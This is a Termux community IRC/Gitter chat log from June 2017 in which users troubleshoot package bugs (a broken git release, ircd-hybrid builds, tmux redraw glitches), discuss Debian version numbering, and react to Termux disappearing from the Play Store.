2017-06-02 12:31:10 cottongin weechat
2017-06-02 12:35:46 gitter1 (vishalbiswas) i use androirc. its better
2017-06-02 12:36:48 gitter1 (sdrausty) @vishalbiswas androirc: command not found
2017-06-02 12:37:27 gitter1 (vishalbiswas) @sdrausty I was kidding https://play.google.com/store/apps/details?id=com.androirc
2017-06-02 12:38:06 parthanon Ive just had a look at Rice irc. i kinda like using a terminal though.
2017-06-02 12:38:26 gitter1 (sdrausty) frumpylava: TX for debugging information https://github.com/sdrausty/buildAPKs/issues
2017-06-02 12:49:41 parthanon wc
2017-06-02 13:00:51 aleph- frumpylava: Chihaya torrent tracker?
2017-06-02 13:03:40 aleph- Ah, I see. Got a sample config I can look at for getting it deployed at home.
2017-06-02 13:06:56 frumpylava aleph-: It’s badly documented, but it mostly seems to work.
2017-06-02 13:07:14 aleph- Gotcha
2017-06-02 13:07:49 aleph- So it it as simple.as deploying it on a LAN and pushing files to it/handling out torrent links?
2017-06-02 13:11:51 frumpylava aleph-: yes.
2017-06-02 13:12:01 aleph- Gotcha. Thanks.
2017-06-02 13:13:54 frumpylava I still have a probkem where transmission seems to stop seeding after a while and I have to restart it. But other than that it works.
2017-06-02 13:15:48 aleph- Aye, gotcha.
2017-06-02 13:25:51 frumpylava aleph-: But it’s a very cool way to share files with a group of people at a conference or a hackerspace or similar situations.
2017-06-02 13:27:10 BrainDamage still kind of awkward tought, yo need a central server to setup, hand the files etc
2017-06-02 13:33:31 frumpylava BrainDamage: Well, if a tracker is running, everyone in the network can share files. They don’t have to be seeded by termux also.
2017-06-02 13:39:45 BrainDamage no, but, you need to create tracker files, and then share the file
2017-06-02 13:40:01 BrainDamage sharing the file is then another problem
2017-06-02 13:40:30 BrainDamage generally if you can share the torrent file you can as well share the original file
2017-06-02 13:40:57 BrainDamage only if you’re sharing multi-GB files to many users the torrent will yield an advantag
2017-06-02 15:00:25 frumpylava BrainDamage: You can also just share a magnet link. It’s just a short string that you can send someone via jabber / email
2017-06-02 15:02:17 BrainDamage magnet implies there’s a bootstrapped DHT p2p network
2017-06-02 15:02:51 BrainDamage which implies in turn internet access, or, manual configuration of the bootstraping peer ip for master nodes to lan clients
2017-06-02 15:03:10 BrainDamage first requires an internet connecton, latter configuring obscure shit
2017-06-02 15:10:36 frumpylava BrainDamage: hmm… it seemes to work without that when I tested it. The magnet link contains the tracker url. But sharing small files is a lot easier than big files. But I agree that for sending a file to 1 friend using bittorrent is overkill. I plan to use it to share big files to multiple people.
2017-06-02 17:41:38 live_the_dream_s hey frumpylava could you remove some old package requests that are completed? ncmpcpp is one
2017-06-02 17:42:23 live_the_dream_s requesr for syncthing is another
2017-06-02 17:48:13 aleph- Eh, I’ll stick to using syncthing from f-droid. Seems easier.
2017-06-02 17:52:43 live_the_dream_s its not there as a replacement
2017-06-02 17:53:06 live_the_dream_s 2 reasons … 1 usable in your home dir
2017-06-02 17:53:22 live_the_dream_s 2 able to be run as root…
2017-06-02 17:53:25 aleph- Fair point.
2017-06-03 01:03:21 u0_a166 is there a way to access MMS messages (not only SMS)?
2017-06-03 05:44:46 u0_a206 howdy
2017-06-03 05:45:09 u0_a206 do you have any idea why tsu isn’t working?
2017-06-03 05:45:32 u0_a206 i mean i works but it says permission denied
2017-06-03 05:46:04 u0_a206 $ tsu
2017-06-03 05:46:05 u0_a206 # nano
2017-06-03 05:46:07 u0_a206 bash: /data/data/com.termux/files/usr/bin/nano: Permission denied
2017-06-03 05:46:10 u0_a206 #
2017-06-03 07:45:03 th30nE I’m trying to copy a file x to y with cp -u x >y but everytime it returns error. Am I missing something?
2017-06-03 08:12:34 gitter1 (jhegedus42) can i trigger a keyboard up event from command /i
2017-06-03 08:12:38 gitter1 (jhegedus42) line?
2017-06-03 08:13:26 gitter1 (jhegedus42) i am having this issue https://github.com/termux/termux-packages/issues/1063
2017-06-03 08:13:42 gitter1 (jhegedus42) really puzzling
2017-06-03 08:14:01 gitter1 (jhegedus42) any idea why this might be happening?
2017-06-03 08:16:56 onexore I’m using nextapp keyboard and when on editor i just slide from left to trigger keyboard … Dont know if it termux feature or keyboard app releted function
2017-06-03 08:17:18 onexore Its just works ;)
2017-06-03 08:17:53 gitter1 (jhegedus42) from left?
2017-06-03 08:18:54 onexore Yup
2017-06-03 08:18:58 joco42 i’m jhegedus42 from irc
2017-06-03 08:19:03 joco42 hmm
2017-06-03 08:19:30 joco42 ok
2017-06-03 08:19:33 joco42 strange
2017-06-03 08:19:53 joco42 but how is termux opening the keyboard?
2017-06-03 08:20:06 joco42 on the left there is a keyboard button
2017-06-03 08:20:21 joco42 can i trigger that from terminal?
2017-06-03 08:20:24 joco42 or bash?
2017-06-03 08:21:08 joco42 maybe send some mouse event to the main terminal?
2017-06-03 08:21:13 joco42 programmatically
2017-06-03 08:21:35 joco42 that could work
2017-06-03 08:23:53 joco42 or maybe call tasker from termux
2017-06-03 08:24:05 joco42 and tasker opens the keyboard
2017-06-03 08:24:08 joco42 somehow
2017-06-03 08:41:37 onexore https://pastebin.com/Kz8m87Kr found that on telegram group, switching keyboard from gboard to hacker’s keyboard … Maybe u can elaborate more, dunno for sure ;)
2017-06-03 08:54:33 cori1 Hey guys
2017-06-03 08:54:57 cori1 I’m wondering how can I setup password auth for ssh in termux
2017-06-03 08:54:59 cori1 Using either openssh or dropbear servers
2017-06-03 09:20:19 onexore Got this from termux help section : The Termux sshd binary does not support password logins, so a key needs to be authorized in ~/.ssh/authorized_keys before connecting. Use ssh-keygen to generate a new one if desired.
2017-06-03 09:35:05 joco42 thank onexore
2017-06-03 09:50:50 cori1 well sad
2017-06-03 10:55:47 Y2kVd How can I close/delete sessions
2017-06-03 12:02:41 u0_a107 test
2017-06-03 12:04:29 * u0_a107 zero1
2017-06-03 12:05:37 u0_a107 hgfd
2017-06-03 12:07:10 u0_a107 test5
2017-06-03 12:14:12 u0_a107 exit
2017-06-03 15:32:12 sdrausty IRC/Gitter bot is down
2017-06-03 17:31:08 sdrausty frumpylava: IRC/Gitter bot is down
2017-06-03 17:32:10 rods-tab3 yea all IRC is down .. only bots left are posting
2017-06-03 17:34:47 msyea Have a noob question. If I install mariadb or postgresql via apt, how do I start the service?
2017-06-03 18:39:58 sdrausty https://plus.google.com/109614420080028230010/posts/GF9xmkh2iob is not showing up on Google+ Termux
2017-06-03 18:40:08 sdrausty IRC/Gitter bot is down
2017-06-03 20:19:05 u0_a166 msyea : i think this might help esp. sections 3-4 https://www.postgresql.org/docs/9.4/static/tutorial-start.html
2017-06-03 20:25:13 u0_a166 Y2kVd : a terminal session from the shell? usually “exit” command, or ctrl-D. Long press the screen (or ctrl-alt-M) and click “kill process” can stop your shell but not best way. Android Settings->Apps->…Termux should have a “force stop” option too.
2017-06-03 20:41:26 rods-tab3 draging from left edge displays all sessions - where they can be terminated
2017-06-04 11:22:36 sdrausty IRC/Gitter bot is down
2017-06-04 11:22:36 sdrausty Please fix the IRC/Gitter bot
2017-06-04 11:59:27 onexore Hello guys …
2017-06-04 22:25:55 aleph- Shite. Means I can’t ask vish a question.
2017-06-04 22:26:30 aleph- live_the_dream_s: Since rust and cargo are working. Can rustup be made to work? Want to get nightly rust running on my phone.
2017-06-04 22:38:45 live_the_dream_s hmm don’t know … probably. im working on other stuff
2017-06-04 23:02:41 gitter1 (mklein994) I just checked and the lua interface (or whatever you want to call it) works in neovim:
2017-06-04 23:02:41 gitter1 (mklein994) ```vim
2017-06-04 23:02:41 gitter1 (mklein994) :lua vim.api.nvim_command(‘echo “Hello, Neovim!”’)
2017-06-04 23:02:41 gitter1 (mklein994) ```
2017-06-04 23:22:28 gitter1 (vishalbiswas) aleph- probably not. but it never hurts to try
2017-06-04 23:23:42 gitter1 (vishalbiswas) rustup supplies android binaries, too. But they are a little different than the ones in termux. You’ll need to have TMPDIR
set to use them
2017-06-04 23:25:04 gitter1 (vishalbiswas) or you can compile rust nightly from source, too
2017-06-04 23:39:52 live_the_dream_s TMPDIR is set now
2017-06-04 23:40:07 live_the_dream_s as of version something
2017-06-04 23:40:26 gitter1 (vishalbiswas) 0.50?
2017-06-04 23:44:25 live_the_dream_s 48
2017-06-04 23:45:06 live_the_dream_s no 49
2017-06-05 02:50:07 Regenaxer Really frustrating this refresh bug of Tmux on Termux
2017-06-05 02:57:06 live_the_dream_s q`s
2017-06-05 03:00:10 Regenaxer Nobody else here uses tmux on termux?
2017-06-05 03:01:36 Regenaxer If I scroll pages in e.g. vim or mutt, garbage remains on parts of the screen
2017-06-05 03:04:35 Regenaxer I think tmux an termux are an ideal combination, see https://picolisp.com/wiki/?TermuxPentiPicolisp
2017-06-05 03:05:00 Regenaxer But with that bug it is disturbing
2017-06-05 03:55:53 frumpylava Regenaxer: I also experience this bug. It’s especially bad in mutt.
2017-06-05 03:56:20 Regenaxer yeah
2017-06-05 03:56:44 Regenaxer ok, good to know it is not my setup
2017-06-05 03:57:13 Regenaxer Probably an ncurses issue
2017-06-05 04:29:39 sdksdk hey guys, quick question
2017-06-05 04:29:46 sdksdk is there any way to tabcomplete in termux?
2017-06-05 04:31:17 Regenaxer yes, you can put bind ‘TAB:menu-complete’ into your .bashrc
2017-06-05 04:31:55 Regenaxer and also: . /data/data/com.termux/files/usr/share/bash-completion/bash_completion
2017-06-05 04:33:40 sdksdk whelp, quite logic. sorry and thanks
2017-06-05 04:34:23 Regenaxer np :)
2017-06-05 06:08:06 gitter1 (lv2eof) Hi. Another question :)
2017-06-05 06:10:37 gitter1 (lv2eof) Which is the first script that is executed when we login to termux?
2017-06-05 06:10:55 Regenaxer I think .profile
2017-06-05 06:11:08 Regenaxer At least I use it to call .bashrc
2017-06-05 06:12:14 Regenaxer bbl
2017-06-05 06:13:02 gitter1 (lv2eof) Ok @Regenaxer. Thanks a lot. I will see and then come back.
2017-06-05 06:13:39 gitter1 (noncom) I experience screen garbage problems with tmux when split in multiple panes all the time. It happens on all platform combinations. Long time ago I was thinking it was a problem of connecting to a tmux session over SSH from a windows machine. But since then I’ve learned that it happens on any setup. Having htop running on one of the panes brings total destruction to nearby screens
2017-06-05 06:16:03 gitter1 (noncom) my guess is that somehow it miscalculates width of the output. probably tries using global width for output in a pane with smaller width and the lines overflow
2017-06-05 07:01:08 paradigm Has anyone found more information about the /proc permissions change? https://github.com/termux/termux-app/issues/299
2017-06-05 07:01:16 paradigm My google-fu isn’t picking up anything and I find it worrying
2017-06-05 07:48:59 Regenaxer gitter1: I see the garbage also without panes. Some text in the middle of some lines is simply not cleared, so it seems not a width problem to me
2017-06-05 07:49:30 Regenaxer In vim I see sometimes two lines deleted when I deleted just one
2017-06-05 07:50:11 Regenaxer Then I need to refresh the whole view, eg go to end of file and back, to see it correctly again
2017-06-05 07:50:56 Regenaxer So I think it is ncurses somehow being clever in not refreshing all relevant parts of the screen, or the wrong ones
2017-06-05 11:36:40 gitter1 (n1had5_twitter) Where is the sources.list located? (looked it up online bt, could’nt find any results)
2017-06-05 12:42:37 gitter1 (vishalbiswas) @n1had5_twitter $PREFIX/etc/apt
2017-06-05 17:01:29 gitter1 (noncom) @sdrausty yeah, I am collecting, re-checking and brushing up the existing information to put in the report. I should be through soon
2017-06-05 18:04:19 gitter1 (sdrausty) @noncom sounds very good. Thanks for taking the time to give some feedback regarding https://plus.google.com/109614420080028230010/posts/GF9xmkh2iob
2017-06-05 18:25:21 gitter1 (lv2eof) @Regenaxer. You mean at user level but I would like to know at machine level. One that I saw that is executed is “/data/data/com.termux/files/usr/bin/login”. Anyway I can’t figure where the PATH variable is defined. Do you know?
2017-06-05 18:56:53 gitter1 (mklein994) @fornwall git
is broken for me. I’ll post an example in a minute.
2017-06-05 19:14:59 gitter1 (mklein994) ```console
2017-06-05 19:14:59 gitter1 (mklein994) $ git clone https://github.com/termux/termux-packages
2017-06-05 19:14:59 gitter1 (mklein994) Cloning into ‘termux-packages’…
2017-06-05 19:14:59 gitter1 (mklein994) [full message: https://gitter.im/termux/termux?at=5935e5ec6462d8493ce3289a]
2017-06-05 22:19:31 gitter1 (vishalbiswas) @pbewig that isn’t where it fails. run make in single job mode (make -j1
) to know which step fails
2017-06-05 22:26:16 gitter1 (vishalbiswas) @lv2eof its defined by the termux-app itself. You might want to look at the android part of the code. A dictionary of initial environment variables is used while creating a new session. https://github.com/termux/termux-app/blob/master/app/src/main/java/com/termux/app/BackgroundJob.java#L111
2017-06-05 22:42:24 gitter1 (pbewig) @vishalbiswas: I ran make -j1. Same error. Something in the guile build is assuming something about where files are stored that termux doesn’t do the same way as a normal unix system. I’m trying to figure out what that is.
2017-06-05 22:43:19 gitter1 (vishalbiswas) @pbewig i know same error. but it should occur after another step and not after GEN guile-procedures.texi
2017-06-05 22:45:29 gitter1 (pbewig) @vishalbiswas: Error occurs after same step.
2017-06-05 23:28:10 gitter1 (mklein994) Anyone else having problems with git?
2017-06-06 00:34:35 gitter1 (vishalbiswas) @mklein994 only in termux-chroot
2017-06-06 00:35:50 gitter1 (vishalbiswas) @mklein994 scratch that. git is broken
2017-06-06 00:37:16 gitter1 (mklein994) Alright, so I’m not the only one.
2017-06-06 00:42:11 gitter1 (vishalbiswas) @mklein994 android is little endian, right?
2017-06-06 00:48:09 gitter1 (vishalbiswas) https://git.kernel.org/pub/scm/git/git.git/commit/?id=d0506fc419f61266e49077b7bed255d7691c0919
2017-06-06 00:52:00 gitter1 (mklein994) I’m not sure. Let me know if anything changes.
2017-06-06 05:06:56 frumpylava That git bug kills a lot of programs. Everything seems to rely on git these days.
2017-06-06 05:13:23 frumpylava fornwall_: Is there a technical reason you don’t leave old .debs on termux.net? It would really help if we had an easy way to downgrade packages if we have a crippling bug with a new version like today.
2017-06-06 05:25:30 gitter1 (noncom) oops, what’s up? the new git package is broken?
2017-06-06 05:25:34 gitter1 (noncom) should I NOT upgrade?
2017-06-06 05:30:47 fornwall_ hm, I’m looking into the git issue
2017-06-06 05:31:17 fornwall_ frumpylava: right, leaving old debs (at least for a few weeks) is probably reasonable
2017-06-06 05:32:27 frumpylava @noncom Don’t upgrade git yet. It’s completely broken
2017-06-06 05:34:01 frumpylava fornwall_: Yeah, a few weeks should be enough. It would also somewhat mitigate the problem where people run “apt install
2017-06-06 05:53:28 fornwall_ I’ve pushed a git update to version 2.13.1.1. it really is 2.13.0, but uses a higher version number to be seen as an update. so it should be safe to update now while we look for a proper fix of git 2.13.1 later
2017-06-06 05:54:29 frumpylava fornwall_: That’s great. thanks.
2017-06-06 07:40:48 gitter1 (mklein994) @fornwall that fixed it. Thanks!
2017-06-06 07:42:16 gitter1 (mklein994) Wouldn’t the version number be 2.13.0-1 (or 2.13.0-2) though?
2017-06-06 07:43:22 gitter1 (mklein994) I thought the dash showed the difference between maintainer updates and version updates.
2017-06-06 07:43:53 gitter1 (mklein994) Or that might only be how it’s done on Arch Linux.
2017-06-06 07:44:29 frumpylava @mklein994 yeah, but apt wouldn’t recognize 2.13.0-1 as an update to 2.13.1-1
2017-06-06 07:45:37 gitter1 (mklein994) Not now; I understand. Just seems misleading to say that it has a more recent version. Maybe it can adopt that method in 2.13.2 or something.
2017-06-06 07:46:06 frumpylava @mklein994 you mean - vs .?
2017-06-06 07:48:32 gitter1 (mklein994) Yeah? Otherwise it looks like git was updated to version 2.13.1.1, as opposed to git getting a patch to fix a build error (i.e. 2.13.0 => 2.13.0-1).
2017-06-06 07:49:03 frumpylava @mklein994 normally in termux - is used for maintainer updates (check profanity for example). It was probably set to 2.13.1.1 instead of 2.13.1-1 by mistake.
2017-06-06 07:49:57 frumpylava @mklein994 it’s because the version number was specified manually (here https://github.com/termux/termux-packages/commit/d6315450c9368c3c61a93a4ebeb6762b855a78b2#diff-443517913f9badc2bcb795761028f023R5). Normally it makes a - automatically.
2017-06-06 07:50:13 gitter1 (mklein994) Yeah probably. Not a big deal; I just thought it would be better to do that in the future.
2017-06-06 07:52:53 gitter1 (mklein994) Looks like it’s set using $TERMUX_PKG_REVISION
.
2017-06-06 11:33:00 gitter1 (noncom) is there any way to stop Termux from vibrating?
2017-06-06 15:20:12 gitter1 (sdrausty) Build over one hundred APKs onDevice https://sdrausty.github.io/buildAPKs/reallyEasilyBuildAndroidAPKsonDevice
2017-06-06 16:38:05 fornwall_ frumpylava @mklein994: about the revision - normally it’s $UPSTREAM_VERSION-$REVISION, so the logical version for the current git package would be 2.13.0-1 as you say
2017-06-06 16:39:02 fornwall the problem is that we need the current version to be higher than the faulty 2.13.1 version
2017-06-06 16:39:53 fornwall so, 2.13.1-1 would probably be a better choice than 2.13.1.1, but would still really be a lie
2017-06-06 16:40:44 fornwall there is a third version construct in deb files, in that you can precede the version&revision with an ‘epoch’ number, to correct mistakes such as this
2017-06-06 16:41:10 fornwall $EPOCH:$UPSTREAM_VERSION-$REVISION
2017-06-06 16:42:48 fornwall so we could call the current package 2:2.13.0-1, and the 2: epoch part would mean that we are on our second version scheme for the package, and apt&dpkg would consider it higher than anything without a “$EPOCH:” prefix
2017-06-06 16:43:24 fornwall however, the annoying thing is there is no way back, you need to keep the “2:” epoch part forever (or bump it to 3:, ..)
2017-06-06 16:43:59 fornwall (the golang package currently use this due to a historic mistake in version numbering)
2017-06-06 16:44:38 fornwall so, for the git package, we instead lie a little bit now, and await 2.13.2 or 2.14.0 which will fix the incorrect version numbering scheme
2017-06-06 19:31:43 gitter1 (mklein994) Yeah, I’d go with that; that’s how other packages in this repo ~were~ are resolved. Epoch is ideally (IMHO) reserved for when upstream decides to decrease version numbers for some reason.
2017-06-06 19:36:15 rods-tab3 3.11 < 3.2 but 2 < 11 (in some number systems)
2017-06-06 21:59:27 gitter1 (vishalbiswas) rods-tabs3: welcome to version numbering
2017-06-06 22:21:29 live_the_dream_s going to see if i can R working in vncserver vish
2017-06-06 22:40:54 gitter1 (sdrausty) Does anyone know of open source APKs for book projects? There is something that comes close at https://github.com/sdrausty/buildAPKs/tree/master/sourcesOfAPKsBuiltOnDevices/Manpages to what I am seeking, more like a book.
2017-06-06 22:43:22 gitter1 (sdrausty) I have triedbook APK site:github.con
searches: No results.
2017-06-06 22:52:19 gitter1 (vishalbiswas) @sdrausty there are a lot of tutorial and documentation apps for programming languages, etc on the play store but not many of them are open source
2017-06-06 22:53:21 gitter1 (vishalbiswas) live_the_dream_s: I’ll update that x11 branch sometime this week
2017-06-06 22:54:33 live_the_dream_s im trying to get gtk to work almost there
2017-06-06 22:55:35 gitter1 (vishalbiswas) live_the_dream_s: I tried, too. but no luck for me
2017-06-06 22:56:20 gitter1 (sdrausty) @vishalbiswas thank you. That’s what I also found a while ago regarding book APK topic.
2017-06-06 23:02:36 gitter1 (sdrausty) Can we get ircd
packaged for Termux?
2017-06-06 23:04:07 gitter1 (vishalbiswas) @sdrausty git repo link?
2017-06-06 23:04:29 gitter1 (sdrausty) APK onDevice?
2017-06-06 23:05:36 gitter1 (vishalbiswas) @sdrausty ircd
2017-06-06 23:06:10 gitter1 (sdrausty) @vishalbiswas ://github.com/ircd-hybrid/ircd-hybrid
2017-06-06 23:06:18 gitter1 (sdrausty) https
2017-06-06 23:06:28 gitter1 (vishalbiswas) don’t need https
2017-06-06 23:06:53 gitter1 (sdrausty) ?
2017-06-06 23:08:16 gitter1 (vishalbiswas) @sdrausty doesn’t look complex. if i can, i’ll do it in 2 hours
2017-06-06 23:14:28 gitter1 (sdrausty) @vishalbiswas thank you. Good luck!
2017-06-06 23:15:11 gitter1 (sdrausty) Screen source messmer https://github.com/sdrausty/sdrausty.github.io/blob/master/bitpics/irc.png
2017-06-06 23:19:13 gitter1 (vishalbiswas) @sdrausty what is its package name in Ubuntu?
2017-06-06 23:20:26 gitter1 (sdrausty) @vishalbiswas tried find -type f -exec termux-fix-shebang {} \;
on device (a smartphone).
2017-06-06 23:20:57 gitter1 (sdrausty) checking whether yytext is a pointer… yes
2017-06-06 23:20:57 gitter1 (sdrausty) : error: cannot run /bin/sh ./config.sub
2017-06-06 23:21:08 gitter1 (sdrausty) configure
2017-06-06 23:21:13 gitter1 (vishalbiswas) @sdrausty export CONFIG_SHELL=sh
2017-06-06 23:23:03 gitter1 (sdrausty) export CONFIG_SHELL=sh
messmer wow
2017-06-06 23:23:27 gitter1 (sdrausty) Configuration complete. Type make
2017-06-06 23:27:36 gitter1 (sdrausty) /data/data/com.termux/files/home/git/sdrausty/ircd-hybrid000/tools/mkpasswd.c:161: undefined reference to `getpass’
2017-06-06 23:27:36 gitter1 (sdrausty) clang-4.0: error: linker command failed with exit code 1 (use -v to see invocation)
2017-06-06 23:27:55 gitter1 (vishalbiswas) it requires getpass. @fornwall can we create another support lib with functions like getpass in them? getpass is already used by 12 packages
2017-06-06 23:28:01 gitter1 (sdrausty) make: *** [Makefile:369: all] Error 2
2017-06-06 23:30:38 gitter1 (sdrausty) Passwords are an issue. While we are at it could we mount and span volumes…
2017-06-06 23:34:19 gitter1 (sdrausty) On an sdcard the largest file size is ~2GB. Solet’s say 16 files mounted would give a nice 32GB drive (with complete multi user permissions).
2017-06-06 23:36:19 gitter1 (vishalbiswas) @sdrausty what arch are you on?
2017-06-06 23:36:49 gitter1 (sdrausty) arm and aarch64 How about you?
2017-06-06 23:38:20 gitter1 (sdrausty) With your diagnosis it doesn’t make much sense to rebuild on arm. Does it?
2017-06-06 23:40:14 gitter1 (vishalbiswas) @sdrausty https://drive.google.com/open?id=0B8Q4yBRb9PSHZ0xjei1senVKeWc tell me whether it works well. probably fails when you set up a hostname
2017-06-06 23:43:11 gitter1 (vishalbiswas) i uploaded aarch64 too
2017-06-06 23:43:39 gitter1 (sdrausty) dpkg-deb: error: ‘irc.deb’ is not a debian format archive
2017-06-06 23:43:40 gitter1 (sdrausty) dpkg: error processing archive irc.deb (–install):
2017-06-06 23:44:31 gitter1 (vishalbiswas) @sdrausty try the aarch64 one
2017-06-06 23:45:53 gitter1 (sdrausty) $ dpkg -i /sdcard/Download/ircd-hybrid_8.2.22_arm.deb
2017-06-06 23:45:53 gitter1 (sdrausty) dpkg: error processing archive /sdcard/Download/ircd-hybrid_8.2.22_arm.deb (–install):
2017-06-06 23:45:53 gitter1 (sdrausty) package architecture (arm) does not match system (aarch64)
2017-06-06 23:46:15 gitter1 (sdrausty) Where is the aarch64 one?
2017-06-06 23:46:23 gitter1 (vishalbiswas) in the same folder
2017-06-06 23:46:29 gitter1 (vishalbiswas) https://drive.google.com/drive/folders/0B8Q4yBRb9PSHcVAxbjhZQmszbVU
2017-06-06 23:48:07 gitter1 (vishalbiswas) @sdrausty your download is corrupted. I can install just fine
2017-06-06 23:50:24 sdrausty ircd: version hybrid-8.2.22(20170326_8085)
2017-06-06 23:50:24 sdrausty ircd: pid 29313
2017-06-06 23:50:24 sdrausty ircd: running in background mode from /data/data/com.termux/files/usr
2017-06-06 23:50:47 sdrausty gitter’s down though
2017-06-06 23:50:54 gitter1 (vishalbiswas) but closes immediately because it can’t find configuration
2017-06-06 23:52:19 gitter1 (sdrausty) Closes like you said. And Gitter is back up.
2017-06-07 00:02:40 gitter1 (sdrausty) Does not like ircd -configfile /data/data/com.termux/files/usr/etc/reference.conf
either.
2017-06-07 00:04:00 gitter1 (vishalbiswas) just a minute
2017-06-07 00:06:53 gitter1 (sdrausty) Probably should change some of the parameters to 127.0.0.1
2017-06-07 00:10:10 gitter1 (vishalbiswas) @sdrausty any other recommendations?
2017-06-07 00:10:48 gitter1 (amreisa) Hello
2017-06-07 00:11:20 gitter1 (amreisa) I want know Termux
2017-06-07 00:12:27 gitter1 (amreisa) I want know if Termux have Qt paxk ?
2017-06-07 00:13:12 gitter1 (sdrausty) @vishalbiswas does not like 127.0
2017-06-07 00:13:23 gitter1 (sdrausty) 0.1 either.
2017-06-07 00:13:48 gitter1 (vishalbiswas) @sdrausty that is not the problem. I’ve solved it. am just adding gnutls support
2017-06-07 00:14:34 gitter1 (sdrausty) Great!
2017-06-07 00:15:47 gitter1 (vishalbiswas) @amreisa currently there is not gui/qt support in termux
2017-06-07 00:16:12 gitter1 (amreisa) Did Termux have Qt pack ?
2017-06-07 00:16:45 gitter1 (amreisa) did QtCore work ?
2017-06-07 00:17:20 gitter1 (vishalbiswas) @amreisa no, Qt is not available
2017-06-07 00:18:55 gitter1 (amreisa) @vishalbiswas Thx for help I hopeI can use Qt with termux soon
2017-06-07 00:19:45 gitter1 (amreisa) Can I use it with linux with install script ?
2017-06-07 00:21:00 gitter1 (vishalbiswas) @amreisa its not clear what you mean to ask…
2017-06-07 00:23:00 gitter1 (amreisa) Can I install linux with termux ?
2017-06-07 00:24:25 gitter1 (amreisa) if yes then I can run Qt caruater
2017-06-07 00:26:48 gitter1 (amreisa) creator
2017-06-07 00:27:03 gitter1 (vishalbiswas) @amreisa no, termux is separate. its a collection of cli tools
2017-06-07 00:28:00 gitter1 (amreisa) Thanks.
2017-06-07 01:12:07 gitter1 (vishalbiswas) @sdrausty I updated the packages again. please check and tell whether they work for you or not
2017-06-07 01:50:33 gitter1 (jaytula) just wondering if there’s any active work on trying to build the php7 package with mysql support for termux? it must be hard for some reason.
2017-06-07 02:10:49 frumpylava @jaytula I did a pull request for it and it works pretty good. The problem is that it relies on mariadb which, at the moment, can’t be built for arm.
2017-06-07 02:12:01 frumpylava @jaytula, but we expect the new NDK version, which should be released any moment now will fix this issue. Then php can be built with mysql support.
2017-06-07 02:47:19 gitter1 (jaytula) frumpylava: thanks for the great answer :)
2017-06-07 08:25:15 parvathy hey
2017-06-07 08:25:28 parvathy u guys us irssi on termux?
2017-06-07 08:25:50 parvathy anybody??
2017-06-07 08:26:18 parvathy how to pageup in termux??
2017-06-07 08:29:52 parvathy got it. thanks dorks
2017-06-07 09:49:14 onexore Help, running ruby wpscan.rb gave me error function getdtablesize not found on libc.so … Android 7.1.2 with ruby-dev packages with some gems installed
2017-06-07 09:50:01 onexore Any idea guys?
2017-06-07 10:36:17 fornwall onexore: “The getdtablesize functions has been deprecated by Posix and has been removed from Android’s LB64 ABI. Replace calls to it with the modern equivalent sysconf(_SC_OPEN_MAX)”
2017-06-07 10:37:08 fornwall onexore: perhaps some ruby gem needs to be fixed, I don’t think core ruby uses getdtablesize
2017-06-07 11:21:13 onexore I see that, thanks for the explanation … And sorry for being bad internet connection lol
2017-06-07 11:21:45 onexore Its keeps me up and going :(
2017-06-07 13:08:33 gitter1 (sdrausty) @vishalbiswas I cannot download your new packages.
2017-06-07 14:11:36 gitter1 (vishalbiswas) @sdrausty ?
2017-06-07 14:13:04 gitter1 (sdrausty) @vishalbiswas not found at Google Drive.
2017-06-07 14:18:01 sdrausty @vishalbiswas https://github.com/sdrausty/sdrausty.github.io/blob/master/bitpics/ircpwf.png
2017-06-07 14:24:28 gitter1 (vishalbiswas) @sdrausty https://drive.google.com/drive/folders/0B8Q4yBRb9PSHcVAxbjhZQmszbVU
2017-06-07 14:34:53 gitter1 (sdrausty) Download failed
2017-06-07 14:35:06 gitter1 (sdrausty) Item doesn’t exist
2017-06-07 14:35:51 gitter1 (sdrausty) nettools.deb downloaded fine
2017-06-07 17:14:55 samitefan1 Did termux get pulled from the Google Play Store?
2017-06-07 17:15:48 samitefan1 I’m not able to find the main app anymore.
2017-06-07 17:22:22 samitefan1 Hello?
2017-06-07 17:28:19 samitefan1 Has termux disappeared from the app store for anybody else?
2017-06-07 17:40:01 sdrausty samitefan1: Can’t find it on the Google Play Store either.
2017-06-07 17:40:43 samitefan1 Oh goody it’s not just me.
2017-06-07 17:41:49 sdrausty The Termux addons are still there.
2017-06-07 17:46:24 samitefan1 Correct, just the main app disappeared.
2017-06-07 17:47:21 samitefan1 Is fornwall around?
2017-06-07 17:48:07 sdrausty What do you think they don’t like about Termux?
2017-06-07 17:48:46 samitefan1 Don’t know if they pulled out or if fornwall did.
2017-06-07 17:49:21 sdrausty Why would he pull the main app?
2017-06-07 17:50:06 samitefan1 Don’t know. Whole thing is odd.
2017-06-07 17:54:25 sdrausty git
breaks, now this.
2017-06-07 18:03:31 rods-tab3 maybe you are just not worthy of termux ??
2017-06-07 18:05:50 rods-tab3 best: https://play.google.com/store/apps/details?id=com.termux and https://termux.com
2017-06-07 18:08:17 samitefan1 Item not found error on mpbile
2017-06-07 18:08:27 samitefan1 Mobile*
2017-06-07 18:09:42 rods-tab3 the store doen’t list it in my installed apps either
2017-06-07 18:10:15 samitefan1 Same here. Dns issue?
2017-06-07 18:12:11 rods-tab3 maybe fornwall picked up his marbles and went home
2017-06-07 18:18:10 rods-tab3 the droid seems to have it; is 0.50 the latest ? https://f-droid.org/repository/browse/?fdid=com.termux
2017-06-07 18:18:16 gitter1 (sdrausty) You’re right. We’re learning too much about Android. Time to go home.
2017-06-07 18:19:14 rods-tab3 no kidding - time for Andromeda - androids replacement
2017-06-07 18:20:22 rods-tab3 at least it still seems to work ie apt update; is ‘apt upgrade’ still working ?
2017-06-07 18:30:04 rods-tab3 upgrade seems to work
2017-06-07 18:31:32 sdrausty http://termux.net is online.
2017-06-07 18:35:56 sdrausty This might have something to do with the non-compete clause Google likes to promote with its’ vendors.
2017-06-07 18:58:20 samitefan1 Say wha? What is it competing with?
2017-06-07 19:21:20 sdrausty Search “google non-compete”
2017-06-07 19:28:59 rods-tab3 store still down
2017-06-07 19:31:54 rods-tab3 i think??? he is being sarcastic ::–))
2017-06-07 19:33:43 gitter1 (sdrausty) When you are in charge of Termux, you control Android. No Termux, who is in charge? Android, of course.
2017-06-07 19:35:42 rods-tab3 but you need to be rooted to take over android
2017-06-07 19:35:51 sdrausty hell no
2017-06-07 19:37:51 sdrausty if you need access to low level ports
2017-06-07 19:38:13 sdrausty agreed
2017-06-07 19:38:15 rods-tab3 or the folders
2017-06-07 19:38:49 rods-tab3 does termux have juiceSSH or mosh ?
2017-06-07 19:38:51 sdrausty why access folders you don’t want to access anyway
